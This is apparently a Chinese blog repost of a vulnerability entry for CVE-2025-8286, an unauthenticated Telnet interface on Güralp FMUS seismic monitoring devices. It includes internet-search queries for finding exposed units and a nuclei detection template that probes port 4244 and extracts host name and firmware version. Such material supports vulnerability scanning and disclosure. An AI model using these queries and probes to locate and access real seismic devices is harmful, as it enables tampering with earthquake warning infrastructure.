Güralp Systems FMUS Series - Missing Authentication for Critical Function

漏洞信息

漏洞名称: Güralp Systems FMUS Series - Missing Authentication for Critical Function

漏洞编号:

  • CVE: CVE-2025-8286

漏洞类型: 未授权访问

漏洞等级: 严重

漏洞描述: Güralp Systems FMUS系列地震监测设备是一款专为地震监测设计的高精度设备,广泛应用于地震预警、地质研究等领域。这些设备通常部署在地震活跃区域,对于地震预警和科学研究具有重要作用。然而,该系列设备存在一个严重的安全漏洞,即未对关键功能进行身份验证。具体来说,设备暴露了一个基于Telnet的命令行接口,攻击者无需任何认证即可访问此接口。这一漏洞的技术根源在于设备未能对Telnet接口实施适当的访问控制措施,导致攻击者可以绕过认证直接与设备交互。成功利用此漏洞的攻击者可以修改硬件配置、操纵数据或对设备进行恢复出厂设置,这可能导致地震监测数据被篡改或丢失,严重影响地震预警的准确性和及时性。由于此漏洞无需认证即可被利用,且攻击过程可以自动化,因此其安全风险极高。

产品厂商: guralp_systems

产品名称: fmus_series_seismic_monitoring_devices

搜索语法: “Welcome to “ && “list of available commands” && port=”4244”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b154e0f42d5081901c522c9bcfc15e8990ed7b8f/http%2Fcves%2F2025%2FCVE-2025-8286.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73

id: CVE-2025-8286

info:
  name: Güralp Systems FMUS Series - Missing Authentication for Critical Function
  severity: critical
  author: darses
  description: |
    Güralp Systems FMUS Series Seismic Monitoring Devices expose an unauthenticated Telnet-based command line interface that allows attackers to modify hardware configurations, manipulate data, or factory reset the device.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to modify hardware configurations, manipulate data, or factory reset the device.
  reference:
    - https://www.cisa.gov/news-events/ics-advisories/icsa-25-212-01
    - https://www.cve.org/CVERecord?id=CVE-2025-8286
  remediation: |
    Update to the latest firmware version or apply vendor recommended patches to secure Telnet access.
  classification:
    cwe-id: CWE-306
    cve-id: CVE-2025-8286
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    cvss-score: 9.8
  metadata:
    vendor: guralp_systems
    product: fmus_series_seismic_monitoring_devices
    shodan-query: '"Welcome to " "list of available commands" port:4244'
    fofa-query: '"Welcome to " && "list of available commands" && port="4244"'
  tags: ics,cve,cve2025,tcp,telnet,guralp

tcp:
  - host:
      - "{{Hostname}}"

    port: 4244

    inputs:
      - data: "\n"
        read: 256
        name: banner

      - data: "system info\n"
        read: 256
        name: system_info

    matchers-condition: and
    matchers:
      - type: word
        part: banner
        words:
          - "Welcome to "
          - 'type "help" for a list of available commands'
        condition: and

      - type: word
        part: system_info
        words:
          - "Host Name: "
          - "Firmware Version: "
        condition: and

    extractors:
      - type: regex
        part: system_info
        group: 1
        regex:
          - "Host\\s+Name:\\s+([\\w\\d\\.\\-]+)"

      - type: regex
        part: system_info
        group: 1
        regex:
          - "Firmware\\s+Version:\\s+([\\d\\.\\-]+)"


Github Poc
#projectdiscovery/nuclei-templates:github issues #未授权访问
Güralp Systems FMUS Series - Missing Authentication for Critical Function
http://example.com/2025/08/01/github_4044612410/
作者
lianccc
发布于
2025年8月1日
许可协议